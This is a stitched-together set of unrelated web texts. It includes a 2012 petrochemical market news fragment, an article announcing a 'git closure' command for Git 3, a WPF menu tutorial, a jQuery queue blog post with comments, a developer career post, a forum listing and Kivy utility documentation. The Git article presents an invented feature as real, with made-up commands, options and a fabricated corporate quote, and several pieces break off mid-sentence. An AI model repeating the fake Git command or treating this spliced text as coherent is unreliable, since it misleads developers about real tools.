in the past few weeks because of a wide gap between cheap domestic material and higher import costs, sources said. “The import cargoes are too expensive for us, so we reduced our procurement this year because of the weak exports [of downstream products],” an end-user said. Most market players are unsure if the price rise will sustain, given the weak demand amid Earlier this week the International Monetary Fund (IMF) cut its forecast for global economic growth and said that emerging market nations, long a global bright spot, are now being dragged down by The IMF cut its 2012 growth forecast for Later on 18 July IMF warned that the European sovereign debt and financial crisis has reached “a new and critical stage” and that the euro currency union is at risk of collapse. The IMF said despite major policy actions, financial markets in parts of the European region remain under acute stress, raising questions about the viability of the monetary union itself. Any exacerbations in already worrying financial crisis in Europe will exert downward pressure on ($1 = €0.82 / $1 = CNY6.37)
http://www.icis.com/Articles/2012/07/19/9579028/asia-bdo-prices-rebound-on-production-cuts-outlook-uncertain.html
CC-MAIN-2014-10
refinedweb
494
55.07
# New feature in Git 3: closures Git is a popular version control system. In Git, an atomic change of one or several files is called a commit, and several consecutive commits are combined into a branch. Branches are used to implement new ideas (features). [![](https://habrastorage.org/getpro/habr/post_images/aa5/222/85a/aa522285a7fd7fd5f8c597050956d878.svg)](https://habr.com/en/post/445680/) It happens that the idea is a dead end and the developer has turned the wrong way, so he needs to roll back to the original version. He should forget about the new branch, switch to the main **dev** or **master** branch and continue working. In this case, the "scion" will hang forever, as well as the desire to remove it. But how to remove the part of the history? This branch shows the efforts of the hard-working programmer, even if in vain. So it will be easier to report to the boss, because an unsuccessful result is also a result! I hasten to rejoice that Git developers are going to introduce a new command to close such "homeless" branches in the third version. The current version is [2.21.0](https://git-scm.com/downloads). How to use this command, what benefits does it give and what do IT companies think? The article answers these and other questions. Description ----------- Now it is possible to close an unsuccessful branch over one of the previous commits. Closure arcs are yellow colored in the pictures below. ![](https://habrastorage.org/getpro/habr/post_images/831/c59/f42/831c59f42a1c28e9316781e918ab5ad2.svg) The commit `4` is the last one for the unsuccessful feature. It was closed over the commit `1`, and then we return to the master and go the other way (the commit `5`). You can also close a commit over itself, thus creating [loops](https://en.wikipedia.org/wiki/Loop_(graph_theory)): ![](https://habrastorage.org/getpro/habr/post_images/6e2/d3b/c7f/6e2d3bc7f118f60d4e3a05762bda92ea.svg) You can close the branch over any commit — Git is smart, it calculates the differences and merges everything correctly: ![](https://habrastorage.org/getpro/habr/post_images/61f/1e3/7e1/61f1e37e1861b8307f715fd3b003fa2c.svg) How to use? ----------- The `merge` command does not include the functionality of closures, since for the first case the branch will be [fast-forwarded](https://stackoverflow.com/q/9069061/1046374), and for the second case nothing will be done (`git already up to date`). In order not to change the old behavior, the developers decided to introduce a closure command: ``` git closure -s $source_commit -d $dest_commit -m $message ``` The first argument `-s $source_commit` sets the hash of the commit from which you want to stretch the loop, and the second (optional) `-d $dest_commit` sets the commit into which the loop will be closed. If it is absent, the closure occurs in the current check-out branch. The `-m $message` argument sets a closure message, like `failed feature, revert to origin`. However, the `--allow-empty-message` option is also available, which allows commits without messages. By default, Git allows only one closure for a pair of commits. To bypass this limitation, the `--allow-multiple-closures` option is available. ![](https://habrastorage.org/getpro/habr/post_images/0d4/735/680/0d4735680312484fdb0f59ee1bf3ec56.svg) After the command is executed, Git calculates the changes, and in the final commit, a double diff will be shown: from the base and closing branches. In the general case, it is an n-dimensional diff, that is, there can be as many closures as you wish. closure-commit is similar to merge-commit with the only difference that it contains several messages, not one. Unfortunately, existing Git GUI's do not have good support of closures. [GitExtensions](https://github.com/gitextensions/gitextensions) preview version displays merge curves instead of elegant arcs. Take a look at the new fields such as `Closure message` and `Closure diff`: ![](https://habrastorage.org/r/w1560/webt/w0/pn/ny/w0pnny3xyxyhdhr1pk9h8i03whk.png) It is worth noting that the `closure` command always changes history (as now Git is a full-fledged time machine!), so now it is possible to push branches only with the `--force` option, or the safe `--force-with-lease` option. Rebase is also available for looped branches, although the logic for recalculating commits is complicated. Also the `auto` option allows automatic closures of all the old branches. In this case, the closing commit is the one starting the branch. With Git IDE plugins, closures can be run periodically. In GitExtensions there is a similar plugin **Delete obsolete branches**. What IT companies think ----------------------- Large IT companies: Google, Facebook, Apple, DeepMind, Positive Technologies, and especially Microsoft, are eagerly awaiting closures, because now it will be possible to formalize the life cycle of branches, including unmerged ones. One of Microsoft's top managers, Michael Richter, [wrote](https://blogs.microsoft.com/git-closure): > The new feature of Git, of course, will reduce the chaos in the world of open source development (and not only). There are a lot of "hanging" branches in our repositories. For example, in [vscode](https://github.com/Microsoft/vscode) we have more than 200 of them, and in [TypeScript](https://github.com/Microsoft/TypeScript) more than 300! And this problem is not only ours. Closures not only improve organization, but also make it possible to track programmer's reasoning, sometimes completely incomprehensible even to colleagues :) Closures reminded me of the movie "Back to the Future", where the characters traveled to the past and the future. I like this movie, I watched it several times. And I think I will love Git even more because if this feature :) Note ---- If earlier the graph of commits was a [directed acyclic graph](https://en.wikipedia.org/wiki/Directed_acyclic_graph) (DAG), then closures extend it to a general [directed graph](https://en.wikipedia.org/wiki/Directed_graph). Using Git, you can describe regular expressions in which the states are commits, and the alphabet is the set of all messages. But this is the topic for the hub "Abnormal programming", and therefore goes beyond the scope of this article. However, if this sounds interesting to you, check out the [article](https://habr.com/post/351158/) on how to store family trees inside Git.
https://habr.com/ru/post/445680/
null
null
1,020
55.84
Recently I have started to work with WPF and I found that there is not much information available about a normal desktop application. Let me say that in C Sharp if you want to start with a desktop application you will select MDI (Multiple Document Interface), according to my knowledge there is no such option in WPF. You can add MDI form but that will be a windows Forms application rather a WPF application. I mean it is "MDIParent.cs" file rather "*.xaml" file. I have created this project with Visual studio 2010 and .Net 3.5 / 4.0. I was coding for a image processing application, that will exactly behave like a Windows Paint application. But before being able to start I stumble upon the idea of how to create the Menu in WPF ! I searched a lot in the internet and have gone through many tutorials and PDF's as well, but what I found is that, every information is available but in unorganized fashion. So I thought lets publish an article for the beginners. This article is a very step by step approach so even if you don't download the source code you just follow the procedure and you will learn what I have come know after Five long days. If you've done Windows Forms development, you should love the fact that adding menu items is as easy as writing html. (Of course, if angle brackets get you down, there's always the designer). The <MenuItem> class defines a Menu Item, which is to say they represent the visible portion of the menu. Lets start now. In normal WPF window you will find two xaml file "App.xaml" and "MainWindow.xaml". If you double click on the MainWindow.xaml file a simple white main Window will appear. If you open the mainWindow.xaml, the code will be looking like this: // <Window x:Class="supertest.MainWindow" xmlns="" xmlns: <Grid> </Grid> </Window> Now our aim is to populate the window with menu. So go to toolbox and select "Menu" and drag and drop it to the main window. (You can adjust the size of it if you want). Now immediately after it you will see that mainWindow.xaml has changed // <Window x:Class="supertest.MainWindow" xmlns="" xmlns: <Grid> <Menu Height="27" HorizontalAlignment="Left" Name="menu1" VerticalAlignment="Top" Width="503" /> </Grid> </Window> Now Menu is created but menu items are absent. Here I will guide you two processes by which you can create menu items like File, Edit, View, Help etc. Open the Xaml file and remove the "/" from the menu block. Just below that add the four lines the way I have added and also close the Menu tag like </menu> // ... <Menu IsMainMenu="True" Height="27" HorizontalAlignment="Left" Name="menu1" VerticalAlignment="Top" Width="503" > <MenuItem Header="_File " /> <MenuItem Header="_Edit " /> <MenuItem Header="_View " /> <MenuItem Header="_Help " /> See the image for better understanding Here is an interesting fact about the "IsMainMenu" property which is exposed by the Menu class, and makes the menu perform as expected when the user presses the Alt or the F10 keys. This property is set to "true" by default for every menu added to your form. "IsMainMenu" when the user presses Alt or F10. The menu is the one that appears first in the XAML. Then the user tab through all of the menu items. If you want to create sub-menu under a menu say File then add the following xaml code // <Window x:Class="supertest.MainWindow" xmlns="" xmlns: <Grid> <MenuItem Header="_File" Visibility="Visible" Name="mnuFile" > <MenuItem Header="_New..." Click="New_Click" > </MenuItem> </MenuItem> <MenuItem Header="_Edit" /> <MenuItem Header="_View" /> <MenuItem Header="_Help" /> </Grid> </Window> Now press F5 and you will see "New..." sub menu is added in the File menu. Similar way you can add other menus. This approach is very simple, because here you don't have to code in xaml but to follow simple process. In the "mainWindow" click and select Menu bar. Go to Properties and under "Common" attributes select "Items". Click in the Editor button and another window will pop up. Here you will see all the Present Menu items. If you want to add another, just click on "Add" and in the Properties Box under section Header give a name. For example You just click on Add and give Name "Project". close the Window and press F5. You will see Project is another menu item. So till now we have completed adding menu and sub-menu, to make a perfect Desktop Applications. Now we want to add toolbar buttons beside the sub-menus. Like the below image "mainWindow" "Common" "Items" "Project" Here in our application "New..." "Open..." and "Save" menus should display graphics (ala icons) in the left part. This part is quite tricky. Those who are familiar with Windows forms, knows that there is a folder called Resources in Windows Forms and to access those files under it, you just need to give the path in your code behind. But in WPF there is no such folder called Resources in the beginning. Here the procedure is... (I am supposing that you have already downloaded the png / ico files for New, Open and Save options in the desktop) In the solution Explorer, double click on "Properties". In the new tab window go to "Resources". Click in the drop down list of "Add Resource". Click in the "Add Existing File". Go to desktop and add the three files, you have downloaded. Close the tab and, you will see that in Solution Explorer Resources Folder is added.This part is not still over yet. Even if you have put those files under Resources folder, you need to tell the framework that these files will be used as a Resource. Go to Solution Explorer, go to Resources and select any image, go to Properties, go to Advanced and under Build action property Change "None" to "Resource". Similarly do for other files. Now You can use these files as a toolbar icons, follow the below xaml code,specially the Bold-Italic part: Solution Explorer Resources Properties, Build action </MenuItem> <MenuItem Header="_New..." Name="menuNew"> <MenuItem.Icon> <Image Source ="Resources/1340618235_flag-new-blue.png"/> </MenuItem.Icon> </MenuItem> <MenuItem Header="_Open..." Name="menuOpen"> > When I was coding for this in mainWindow.xaml, it was something similar to below </MenuItem> <MenuItem Header="_New..." Name="menuNew" Command="New"> <MenuItem.Icon> <Image Source ="Resources/1340618235_flag-new-blue.png"/> </MenuItem.Icon> </MenuItem> <MenuItem Header="_Open..." Name="menuOpen" Command="Open"> > The only difference this Command="New" was doing is, it put all the sub-menus in inactive / disable state. So even if you try to put a click event like Click="New_Click" it doesn't work. I will tell you later why it is? May be in my Next article. Command="New" Click="New_Click" So till now we have created menu and submenu with icons. Now the final part. My main intention was to guide you about the menu creation like normal desktop application. So that part is done. Now I will write a simple code to load an image in the main window and try to zoom in - zoom out using mouse wheel. First put an image box in the grid from Toolbox. By default the name of this will be image1. Now select Open submenu in xaml file and go to Properties. Select Events. Double click on Click event or beside the Click box writedown the "Open_Click". Here you can see that Open menu has a name menuOpen, don't use any other name, you will get compile time error. "Open_Click" menuOpen In the Open_Click event in your mainWindow.xaml.cs file put the following code. Open_Click private void Open_Click(object sender, RoutedEventArgs e) { FileDialog fDlg = new OpenFileDialog(); fDlg.DefaultExt = ".jpg"; fDlg.FilterIndex = 1; if (fDlg.ShowDialog() == System.Windows.Forms.DialogResult.OK) { BitmapImage bmp = new BitmapImage(); bmp.BeginInit(); bmp.UriSource = new Uri(fDlg.FileName); bmp.EndInit(); image1.Source = bmp; } } } If you didn't get any error at compile time then you are lucky, or may be your Visual Studio Version is added the required Referrence. Many of us will actually get an error in the following line. FileDialog fDlg = new OpenFileDialog(); You may get an error "The type of namespace FileDialoge doesn't exist in the namespace..." This is because by default System.Windows.Forms namespace is not included in the WPF References. So in order to add that namespace, right click on References, click on "Add References...". it will again open another window select .Net tab, navigate through "System.Windows.Forms" and select it or double click on it. Now in your mainWindow.xaml.cs file Add References... System.Windows.Forms mainWindow.xaml.cs add the last line of the image, "using System.Windows.Forms" and there will no compile time error. "using System.Windows.Forms" So we have completed creating menu and sub-menu in WPF. Now its time to run the application. Press F5. Select File, Select New and load an image file in the Image box. While I was writing my code I was using a lot of resources from the internet, but there are so much of them and those are not available in organized way, so, I can't put all the name here. Few articles from wpftutorial.net definitely helped me. I learned a lot of things when I was coding for the menu items in WPF. It was Fun, it was challenging and some times it was frustrating too. That's the reason that being a fresher I started to share my knowledge of whatever I have learned. Hope the explanation will help the beginners, specially looking for the menu items creation in desktop applications. Definitely there are and there must be some better approach, better code, written for this kind of Programming / design, what I tried to delve into is purely from a beginners point of view. This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Deb Kumar Ghosal wrote:but it is uploaded and available at the Top. .
http://www.codeproject.com/Articles/407547/Creation-of-Menu-and-submenu-in-WPF-desktop-applic
CC-MAIN-2014-52
refinedweb
1,683
66.74
This and an Arduino to a friend. What a great combination! As a final part of the gift, I am making a post about how to program the 7-segment display to help them get started. It may be too late to order the 7-Segament display and Arduino for the Holidays, but it’s never too late to get a MAKE gift subscription or Maker SHED Gift Certificate. What you need: Here is a list of the components that you will need for this build. - Arduino – Available in the Maker Shed - A HC4LED Display – Available here - Gift Card – Download one from here - MAKE gift subscription – Available in the Maker SHED - 9V Battery Backpack – Available here - Double sided tape Tools you need: - Soldering Iron - Wire cutters - Fume Extractor – Make you own Step 1: Print the card Print the MAKE Gift Subscription card. You can download one here. I modified mine a bit, but you don’t have to, just find a spot that it will fit on any of the cards. Next, Cut an opening 1 5/8″ x 5/8″ where you want the display.Step 2: Prepare the display The display comes wired with connectors. Start by cutting off the wire connector that isn’t connected to the display. Next, “tin” the wires so they are easier to insert into the Arduino header pins. Now it’s time to remove the red bezel that is around the 7-segment displays. Carefully cut all the red plastic off. It may be easier to drill out the holes where the plastic attaches to the board. Connect the data wire to pin 4 on the Arduino. Next, connect the clock wire to pin 5 on the Arduino. Then, connect the (+) wire to the +5 volt pin of the Arduino. Finally, add the (2) ground wires to the ground pins of the Arduino It’s really easy, just 5 wires, and you are done. Now you can attach the display to the Arduino with double-sided tape. You only need 2 small pieces on each side. Next, attach the card to the display with double-sided tape. You might need to add more to one side so the card is parallel to the board. Finally, add one more piece of double-sided tape to the battery backpack and attach it to the Arduino. Step 3: Upload the code // HCLED Code for How-to Tuesday // Makezine.com // Marc de Vinck 2008 CC Share alike #include <HC4LED.h> #define DISP_DATA_PIN 4 //cdefine data pin #define DISP_CLOCK_PIN 5 //cdefine click pin #define DISP_BLANK_PIN 7 //required by library, not hooked up on the display HC4LED disp(DISP_CLOCK_PIN, DISP_DATA_PIN, DISP_BLANK_PIN, true); void setup(){ // nothing to setup! } void loop() // do this over and over again { disp.scroll_text("happy holidays ", 100); //scroll text disp.display_text("2008", 2500); //static text } The display has a library that is available here. This makes it really easy to work with. Download the folder and place it in the “hardware” library of the Arduino application. Now you can upload this code to your Arduino. Simple! If you aren’t sure how to use an Arduino, check out this link. Step 4: Enjoy Now all you have to do is turn on the Arduino and you are ready to give your card away. In the Maker Shed: Make: Arduino
http://makezine.com/2008/12/18/howto-tuesday-hacking-a-make-gift-s/
CC-MAIN-2013-48
refinedweb
554
81.83
READDIR(3) Linux Programmer's Manual READDIR(3) readdir - read a directory #include <dirent.h> struct dirent *readdir(DIR *dirp);:.. EBADF Invalid directory stream descriptor dirp. For an explanation of the terms used in this section, see attributes(7). ┌──────────┬───────────────┬──────────────────────────┐ │Interface │ Attribute │ Value │ ├──────────┼───────────────┼──────────────────────────┤ │readdir() │ Thread safety │ MT-Unsafe race:dirstream │ └──────────┴───────────────┴──────────────────────────┘. POSIX.1-2001, POSIX.1-2008, SVr4, 4.3BSD. A directory stream is opened using opendir(3). The order in which filenames are read by successive calls to readdir() depends on the filesystem implementation; it us ('\0').. getdents(2), read(2), closedir(3), dirfd(3), ftw(3), offsetof(3), opendir(3), readdir_r(3), rewinddir(3), scandir(3), seekdir(3), telldir(3) This page is part of release 4.07 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. 2016-03-15 READDIR(3)
http://man7.org/linux/man-pages/man3/readdir.3.html
CC-MAIN-2016-40
refinedweb
149
60.61
Experimenting With jQuery's Queue() And Dequeue() Methods jQuery comes with a number of built-in animation methods like slideUp() and slideDown(). While these appear to be packaged in their own methods, many of them are powered internally by the animate() method. And while the animate() method handles many of the effects, a string of sequential animations is controlled internally by jQuery's queuing mechanism. This queuing mechanism, while used primarily for the FX ("effects") queue, is also made available as part of the jQuery API. This API allows programmers to manage arbitrary queues for anything that needs to happen sequentially. I have never used the queuing mechanism before, so I thought I would do some experimentation. There are two main methods that control a particular queue: queue() and dequeue(). While these methods can be accessed off of the jQuery namespace, they are designed to be associated with a given element or object. So, you can think of a queue as not just a series of events, but rather as a series of events that take place in the context of a given object. To add an action to a queue, you have to tell the queue() method the name of the queue (the default queue is the "fx" queue) and the callback to be executed as the queue item. jQuery does not have any insight into how the queue items function; as such, we need to explicitly tell jQuery when to move to the next item in the queue. This can be done in two ways: first, you can call the dequeue() method on the given element with the given queue name. This works, but requires you to use the queue name which becomes yet another data point to maintain over time. The second, more optimal way, is to use the next() function that jQuery passes to your queue item callback. The next() function encapsulates the dequeue() method and the queue name into a single point of execution. While the jQuery "fx" animation queue starts to execute immediately (dequeues itself), explicitly managed queues do not. As such, after we build up our queue items, we have to call dequeue() on the queue in order to kick off the series of sequential events. To see this in action, I have set up a small test page: - <!DOCTYPE HTML> - <html> - <head> - <title>jQuery Queue And Dequeue</title> - <script type="text/javascript" src="../jquery-1.4.2.js"></script> - <script type="text/javascript"> - // When the DOM is ready, initialize scripts. - jQuery(function( $ ){ - // Get a handle on the paragraph we want to update. - var para = $( "p:first" ); - // Add the first queue item. Unlike the native animation - // methods, manually created queue items don't start - // executing right away - we have to manually call the - // dequeue() method at the end. - para.queue( - "testQueue", - function( next ){ - para.html( "This is queue item #1: Hot" ); - // Each queue method is passed a "next" method - // reference. This method encapsulates the - // name of the queue into a function. This way - // we can dequeue the current queue without - // having to know its name. - } - ); - // Delay the queue for a bit. - para.delay( 1500, "testQueue" ); - // Add the next queue item. - para.queue( - "testQueue", - function( next ){ - para.html( "This is queue item #2: Sexy" ); - } - ); - // Delay the queue for a bit. - para.delay( 1500, "testQueue" ); - // Add the next queue item. - para.queue( - "testQueue", - function( next ){ - para.html( "This is queue item #3: Sleezy" ); - } - ); - // ---------------------------------------------- // - // When we have our queue set up, we have to manually - // dequeue the first item to get the queue to start - // processing. - para.dequeue( "testQueue" ); - }); - </script> - </head> - <body> - <h1> - jQuery Queue And Dequeue - </h1> - <p> - This is where the queue output will go. - </p> - </body> - </html> As you can see, I am using both the queue() method and the delay() method to build up my, "testQueue", queue. The delay() method, while typically used with animation queues, can be used to add an arbitrary pause to any queue event series. Once I have built up the queue, I use the dequeue() method to kick off the queue events. jQuery's queuing mechanism seems very cool but, I am not sure what I would use it for outside of the native animation methods. I would certainly love to hear how other people might leverage this functionality.'s especially useful when have a series of asynchronous method calls that you want to execute serially, and don't want to maintain a chain of callbacks. Say you want to execute first_async_action() followed by second_async_action(), followed by third_async_action(). You could do this: <pre> first_async_action(function(){ second_async_action(function(){ third_async_action(function(){ alert( 'done!' ); }); }); }); </pre> Or if that looks messy (which it does) you could try something like this: <pre> function start(){ first_async_action( exec_second_async_action ); }; function exec_second_async_action(){ second_async_action( exec_third_async_action ); }; function exec_third_async_action(){ third_async_action( all_done ); }; function all_done(){ alert( 'done!' ); }; </pre> start(); But what if you decide you need to execute third_async_action before second_async_action? either way, it's messy. A good, flexibile, solution would be to do this kind of thing: <pre> function next(){ var action = actions[ idx++ ]; action && action(); }; var idx = 0, actions = [ function(){ first_async_action( next ); }, function(){ second_async_action( next ); }, function(){ third_async_action( next ); }, function(){ alert( 'done!' ); } ]; </pre> Which is pretty much what jQuery's queuing methods do, internally. Man, I wish there was comment code syntax highlighting. @Cowboy, Yeah, sorry about this code formatting in the comments. Never really got that nailed down quite nicely (read: at all). I'll try to make some time for that. I see what you're saying about the sequential AJAX calls. Typically, in my apps, when I need to make sequential AJAX calls, the calls are highly coupled; meaning, the execution of the second relies heavily on the successful execution of the first. I think it would be much less likely that I would simply need to fire things sequentially. Although, I suppose I could always clear the queue if one of the calls came back in a particular way. But even then, I wonder if my code would lose some readability? @Ben, I like SyntaxHighlighter personally.. you can see it in my site's comments, plugin code examples, etc. Easy to use and flexible. Regarding the queueing stuff, I actually wrote a plugin to manage queues, but it works a bit differently than jQuery's built in queue methods. You don't use it specifically on jQuery objects, for example. Still, it really makes a lot of sense to use a managed queue internally for all these animation methods, because it eliminates the whole "ridiculous nested callback" scenario.. and of course, because the queue manager is iterating over an array of queued items, it's trivial to skip a queue item or stop the queue at any time. BTW, here's my code as a gist for easier viewing: @Ben and @Cowboy, thanks for sharing this info. I'm fairly new to jQuery. Thus far I have only really used it for dynamic drop down population, but I would like to branch out into using more of it. @Cowboy, I like the syntax highligher; unfortunately, my WYSIWYG editor (XStandard) does not allow for PRE tags. I am not sure of Script tags though, I should check into that. Maybe I'll take a look at the way it works and see if I can port it over to the ColdFusion side. Right now, I do my formatting on Database-insert so it's only done once. @James, jQuery is wicked awesome! Once you start learning it, you'll be hooked! @Cowboy, Could you please explain the code you written? I was trying to follow your example, but failed (( Here is my code. Probably you could tell me where I got something wrong Thanks! $('.child').bind('click', function(){ var $anchor = $(this); function next(){ var action = actions[ idx++ ]; action && action(); }; var idx = 0, actions = [ function(){ $(function (next) {$anchor.hide('fast');}); }, function(){ $(function (next) {$anchor.show('fast');}); }, function(){ $(function (next) {$anchor.hide('fast');}); }, function(){ alert( 'done!' ); } ]; }); @tylik, it might be more helpful if you fork my gist on GitHub and ask your question there, so that we get the benefit of syntax highlighting, indenting, comments and revisions. Brilliant example! Though its a very simple example, I used the concept for a complicated Ajax system which had multiple steps that should be executed serially reporting the status of each step to the DOM. Amazing and a big thanks to you and your great highlights. @Mahesh, Sounds like you found a really cool use of queue() and dequeue(). Glad that I might have provided some value in that. Great information Hello Ben, This is just awesome, clear and easy to follow. It helped me in a project I am doing, Your site has become an authority on Ajax coding, 2 Thumbs up from me :) Many Thanks, Nader. Excellent explanation, thanks for the post. I have only one question, how do i get to the last effect in queue without execute others effect. Hi, I have read lots of your tutorials, but i have never thanks you. once more your explanation is very helpful and even for non english speaker it's very easy to understand. I hope you will continue like this ! This is what i wanted about jquery queue, explained in a super simple manner. Thanks for sharing.. little example, I fully understand how to manipulate the queue for separate elements and actions anywhere in my code. @Adrien, Awesome! I love it when code makes thing more simple, not more complex. Heck yeah! else could use it. Feel free to tell me if you see a more efficient way to achieve what I'm doing too.
http://www.bennadel.com/blog/1864-experimenting-with-jquery-s-queue-and-dequeue-methods.htm?_rewrite
CC-MAIN-2016-30
refinedweb
1,596
72.46
The Beginning Peter ・3 min read For my first post I decided I should give some background as to how I got to where I am today! The Start I started at a small engineering firm about 3 years ago, with only some minor coding knowledge. While coding was supposed to be a portion of my position, I became more interested in moving our data visualization dashboard forward. The initial stack was pretty simple, data fetching from .csv, some minor database interaction through a small php backend. The frontend was initially built using DC.js and jQuery, with no webpack or build/toolchain. We quickly began to stress the limits of what DC could do perfomantly. Thus began my first major project: writing a custom charting library. The First Project First I needed to learn how to create a library that could be referenced under a common namespace. So I read the d3.js source code! Went in and copied the umd header section and started going. Then it was callbacks, how to get functions to update something in a constructed function (hindsight should have made it a class, but hindsight is 20/20, we're also not at the end). The initial code was pretty ugly and not DRY even in the slightest. No base to extend from. The only upside is we got away from the limitations of DC.js, and cleared up quite a bit of rendering jank. The downside: still importing jQuery(30kb), d3.js (70kb) and at it's most lean my library @ 70kb. And that was only the dependencies. The rest of our code was over 200kb. This led to the next step: removing jQuery. The removal of dependencies and the start of webpack jQuery was relatively easy to remove. d3 does many of the same things jQ does. One dependency gone! Now I had seen webpack mentioned before, but up to this point we only had minimal use for it, and as it complicated our build chain, it took a bit for us to adopt it. Once we got it figured out, it was life changing. Still not using npm at this point, but it was a start. lithtml We then moved to using lithtml. I had though of moving to a ui framework for a bit, at at the time this was the least daunting option. From here I started my second project, a quasi-framework using lithtml as the render agent. After struggling with implementation I decided, this has already been done, why not use an established library. So I started messing around with React. But not wanting to get bound up with its ties to Facebook, I opted for preact! preact + TypeScript Once we started to use preact, I opted to use ts along side, for proper prop checking. This also came with properly using npm, and a fairly in depth webpack config. At this point we had fully transitioned to preact, but the charting library had gone pretty much untouched, with some preact wrappers for proper integration. Then came my most recent and now open source project preact-charts! preact-charts and OSS contributing This started out as creating a small library for us to use internally, but I open sources it as all the current chart libs were react based, with no pure preact equivalents. It's still a WIP, but its stable, and currently supports both preact 8 and the upcoming preact X. Then I got into supporting the libraries I used. Started with some bug reports, that slowly turned into pull requests. I now enjoy helping out with the preact typescript definitions where I can! Hopefully in the future I will continue to engage more with the dev community, and help out on many more projects along the way. Want to give a shout out to the preact team! All are super friendly and willing to help make your pull requests as awesome as possible and help out on slack. Without their support, I would not have the confidence to help out where I can! Thanks for stopping by ❤️ What Advice Would You Give Your 20-year-old Self? If you could go back in time, what advice would you give your 20-year-old self? This project gave me an A++ in college 💯🎓 & this is prolly my last post 😭 Liyas Thomas - JReply v0.1.0 (Release 1.0) delay notice. PDS OWNER CALIN (Calin Baenen) - The Building an Indie Business Podcast- Product Update: iTunes API Edition Alex - Congratulations on your career in software development. You’ve made such a wonderful choice. But you already knew that (based off of the infectious excitement of your article). I enjoyed reading your article. I also started in the industry with only “minor coding knowledge,” and now over a decade later I’ve got over 100 articles on software development and career advice in my wordpress/dev.to queue. I never thought I’d have so much to share. Isn’t life wonderful? :) Thanks for being a part of our community and for contributing to open source. Side note: I love that your library is in TypeScript. Isn’t TS the best? TS is wonderful. Finally switched our node backend over to it a few weeks ago. I don't think I would ever not use it again if given the choice. I agree. I’ll be writing about some advanced techniques in a future article.
https://dev.to/pmkroeker/the-beginning-3a7h
CC-MAIN-2019-30
refinedweb
907
75.1
IT Community for Developers & Technology Enthusiasts i need ur help to write c++ porgram... this is the topic of it """"" Write a C++ program that calculates the perimeter and area of simple geometrical shapes based on the user’s selection. Let the program handle the perimeter and area calculations for circles, and Parallelograms. The program... (Read More) Find Guru who are trying to make an online class room where you can get connected with teachers, attempt assignments and rent books as well Find Guru connects Teachers and Students in a unique way facilitating knowledge transfer and mentor ship through the internet. We... (Read More) I... (Read More) With the iPhone 3GS () slowly coming back into stock after selling out () during the first week of release, there is more good news for potential buyers: the 3GS has been... (Read More) Hey All, I am using MSSQL -2005 with VB6. I have created a master table tblCompany and detail Table tblDetail having foreign key relationship. When i try to insert a value within a TRANSACTION I am getting Error No. -2147217873 at Line No. 0 (The INSERT statement conflicted with the FOREIGN KEY... (Read More) This post has nothing to do with Michael Jackson, his death, his kids, his Neverland Ranch or anything related to him. It has everything to do with my need for a virtual laboratory where I can test virtual machines, write about them or produce other documentation about them without a significant... (Read More) Yahoo! announced () this week that it would build what it said what would be the greenest, most energy-efficient data center in the world, powered by Niagara Falls. Data centers are some of the heaviest users of electrical power there... (Read More) Everyone knows that the iPhone 3GS only comes in black or white varieties, but some unlucky users are claiming to have got their hands on a pink version. The thing is, these started out as bog standard white models but, according to some reports, they get so hot during extended use or when GPS... (Read More) Security stories abound on the Internet, and as we enter a new month an old one has resurfaced. There are legal questions over the Sarah Palin hacking event last year. Graham Cluley has blogged () about it. For me... (Read More) It's been known for a while that current and potential future employers () look at people's profiles on social networking sites such as Facebook. And it's also been known that people are using social networking sites to announce the status of their... (Read More) No sooner had the news of the untimely death of Michael Jackson () hit the Internet than the vultures started circling. For once it was not the gossip columnists and tabloid journalists digging up the dirt, but rather... (Read More) i am supposed to make 2 functions called find and they are supposed to find a character or string if they are similar when i do this progam gives me weird error: "use of search ambigious" "first declared as class search here. //main #include <iostream> #include <cstdlib> using namespace std; (Read More) i am newbie in C#. i would like to make a button to function as search button to search by name and search by date. When i key in data inside textbox1 for search by name ,then press search ,can get the data from database. Same case to textbox2 for search by date, then press search. Besides, i can... (Read More) Hi attempting to make an address book program but hit a snag- I have: A class to give various attributes(phone numbers etc)to an instance which then puts it all into a doc string which can be added to a dictionary- but I want a function that will ask the user for the relevant information and then... (Read More) Had a problem during the week where webpages were being redirected. None of my tools would run (Spybot Search & Destroy, HijackThis etc) any website I tried to visit for updates to AV also failed. I checked Hosts file and nothing strange there. I finally changed the Spybot exe to a new name and... (Read More)
http://www.daniweb.com/
crawl-002
refinedweb
697
68.91
Utils¶ The Utils module provides a selection of general utility functions and classes that may be useful for various applications. These include maths, color, algebraic and platform functions. Changed in version 1.6.0: The OrderedDict class has been removed. Use collections.OrderedDict instead. - class kivy.utils.QueryDict[source]¶ Bases: builtins.dict QueryDict is a dict() that can be queried with dot. d = QueryDict() # create a key named toto, with the value 1 d.toto = 1 # it's the same as d['toto'] = 1 New in version 1.0.4. - class kivy.utils.SafeList(iterable=(), /)[source]¶ Bases: builtins.list List with a clear() method. Warning Usage of the iterate() function will decrease your performance. - kivy.utils.boundary(value, minvalue, maxvalue)[source]¶ Limit a value between a minvalue and maxvalue. - kivy.utils.deprecated(func=None, msg='')[source]¶ This is a decorator which can be used to mark functions as deprecated. It will result in a warning being emitted the first time the function is used. - kivy.utils.escape_markup(text)[source]¶ Escape markup characters found in the text. Intended to be used when markup text is activated on the Label: untrusted_text = escape_markup('Look at the example [1]') text = '[color=ff0000]' + untrusted_text + '[/color]' w = Label(text=text, markup=True) New in version 1.3.0. - kivy.utils.get_hex_from_color(color)[source]¶ Transform a kivy Colorto a hex value: >>> get_hex_from_color((0, 1, 0)) '#00ff00' >>> get_hex_from_color((.25, .77, .90, .5)) '#3fc4e57f' New in version 1.5.0. - kivy.utils.get_random_color(alpha=1.0)[source]¶ Returns a random color (4 tuple). - Parameters - alpha: float, defaults to 1.0 If alpha == ‘random’, a random alpha value is generated. - kivy.utils.interpolate(value_from, value_to, step=10)[source]¶ Interpolate between two values. This can be useful for smoothing some transitions. For example: # instead of setting directly self.pos = pos # use interpolate, and you'll have a nicer transition self.pos = interpolate(self.pos, new_pos) Warning These interpolations work only on lists/tuples/doubles with the same dimensions. No test is done to check the dimensions are the same. - kivy.utils.platform = 'linux'¶ A string identifying the current operating system. It is one of: ‘win’, ‘linux’, ‘android’, ‘macosx’, ‘ios’ or ‘unknown’. You can use it as follows: from kivy.utils import platform if platform == 'linux': do_linux_things() New in version 1.3.0. Changed in version 1.8.0: platform is now a variable instead of a function. - class kivy.utils.reify(func)[source]¶ Bases: builtins.object Put the result of a method which uses this (non-data) descriptor decorator in the instance dict after the first call, effectively replacing the 